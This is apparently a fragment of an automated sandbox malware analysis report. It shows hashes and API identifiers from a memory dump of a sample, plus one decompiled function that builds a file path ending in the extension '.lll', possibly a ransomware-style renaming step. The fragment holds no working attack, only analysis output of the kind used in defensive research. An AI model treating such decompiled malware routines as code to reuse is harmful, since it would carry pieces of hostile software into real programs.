    • String ID: %#@$%s|%s|%s
    • API String ID: 167729887-3117937203
    • Opcode ID: 31e7a16b93228799043f4922bab922d7e50e1f6b6f4be4f849ac52abaeb53ced
    • Instruction ID: b0288632795957ebeb2539a976ce5e4b15338f1fbbd8a95846d8f0ed32c79e93
    • Opcode Fuzzy Hash: 31e7a16b93228799043f4922bab922d7e50e1f6b6f4be4f849ac52abaeb53ced
    • Instruction Fuzzy Hash: 5AE080707403026BEB194638CE19F7F21B5DBE0B44F58C53DB591A62D0E67DCC158315
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415561(WCHAR* _a4) {
    
    				lstrcpyW(_a4, 0x417478);
    				return lstrcatW(_a4, L".lll");
    			}


    APIs
    • lstrcpyW.KERNEL32(004158C0,00417478), ref: 0041556A
    • lstrcatW.KERNEL32(?,.lll), ref: 00415579
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: lstrcatlstrcpy
    • String ID: .lll
    • API String ID: 3905823039-2905095309
    • Opcode ID: b961af1f7a15148f21815a32fb42ddb21dcae1292a419d420e1b1c82f0a3b6f6
    • Instruction ID: c2209d89a82b7f3fb4dc143ab61358adad5c3df97a6e666740324b0d9a566fcd
    • Opcode Fuzzy Hash: b961af1f7a15148f21815a32fb42ddb21dcae1292a419d420e1b1c82f0a3b6f6
    • Instruction Fuzzy Hash: D6C04C75284302ABC6016B10DC099597E62BBA0782B12C679F145500B0C7B68461DA19
    Uniqueness

    Uniqueness Score: -1.00%